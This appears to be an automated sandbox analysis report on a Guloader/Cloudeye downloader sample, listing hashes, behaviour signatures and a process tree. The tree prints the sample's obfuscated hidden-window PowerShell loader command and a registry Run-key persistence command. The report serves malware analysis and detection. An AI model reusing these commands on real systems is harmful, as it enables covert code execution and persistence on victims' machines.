Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
25-04-2024 01:43
Static task
static1
Behavioral task
behavioral1
Sample
8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
Entreprenren.ps1
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
Entreprenren.ps1
Resource
win10v2004-20240412-en
General
-
Target
8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe
-
Size
987KB
-
MD5
189590b2755ed6f134d8fe2c05124926
-
SHA1
e492eb975348e50a32c792d26441cc00912987e7
-
SHA256
8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27
-
SHA512
bf1280546ff4dacddd1b5d08a3a447bb8ccbe2e7c974654e43a266507d6c82080b6f802e4e96ef9f6c5dc0dbc43df64782d66d99e134797971427e88c32219fb
-
SSDEEP
24576:gIqqULDjF7yCOrJHFTuvMJbmhQU/YydIE5Lt6:9sxANuvMxmhB/Yly6
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\mediates = "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\\Officialvirksomhed\\').pshaws;%Linieringernes% ($Localisers)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1908 wab.exe 1908 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1892 powershell.exe 1908 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1892 set thread context of 1908 1892 powershell.exe 32 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Levantine.ini 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\tashlik.ini 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe File opened for modification C:\Windows\resources\0409\marmoreret.ini 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 812 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1892 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1540 wrote to memory of 1892 1540 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe 28 PID 1540 wrote to memory of 1892 1540 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe 28 PID 1540 wrote to memory of 1892 1540 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe 28 PID 1540 wrote to memory of 1892 1540 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe 28 PID 1892 wrote to memory of 2392 1892 powershell.exe 30 PID 1892 wrote to memory of 2392 1892 powershell.exe 30 PID 1892 wrote to memory of 2392 1892 powershell.exe 30 PID 1892 wrote to memory of 2392 1892 powershell.exe 30 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1892 wrote to memory of 1908 1892 powershell.exe 32 PID 1908 wrote to memory of 680 1908 wab.exe 33 PID 1908 wrote to memory of 680 1908 wab.exe 33 PID 1908 wrote to memory of 680 1908 wab.exe 33 PID 1908 wrote to memory of 680 1908 wab.exe 33 PID 680 wrote to memory of 812 680 cmd.exe 35 PID 680 wrote to memory of 812 680 cmd.exe 35 PID 680 wrote to memory of 812 680 cmd.exe 35 PID 680 wrote to memory of 812 680 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe"C:\Users\Admin\AppData\Local\Temp\8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\Admin\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2392
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"4⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:812
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD561176223919926c47b2d40aca8bdd33a
SHA1980f0df56d7d482538cacdedb10f08890fe9d1c6
SHA256acff8f1e29f7fc7424b0b1ae9c53afe12fdc6725548192f34a7a5935f48d242f
SHA51216711f9ba924ca32dca24e2ca8d026c90ad1f8f1909b1f2c5b56c2e3bd08bb1284155e936ee690410350dbe253377b5558b0271151a4ca697507578698c22aba
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
60KB
MD5030ce4392c4a8cc1b477bc3deeacb683
SHA18f36406d9572e6ccf966fb69c0934c234e0617e6
SHA2567e9decd5f91e30b000266db010c2ad399bfd06f64ec43f48ca0f3bc36d69ca6c
SHA5123ec59592857d073ea3f59cd5279fdd4d862ba0a102de7bb3f96db73b64af362c5f017802afe78cb5299a0185f406e4fec097c9986b74d591183ab2aba114e4f4
-
Filesize
295KB
MD53a62f30a51fea9390cd360b7f581c4b3
SHA1afdb9cd054c757b7f65dc150ed2dbbf061f8fab2
SHA256f990b58058ccb0cdf3f0f64c78c24b8f41f5228f90c823369e49decbdc791f05
SHA512b25f81bc7c9c8e43027dff70c9d8ce5cc4c1a803abfc3c193ab80d638e5bbd22e6bb382266bcc69872185ea7ebe6bedc05125d04b7b7420b98e931e6d3ad098b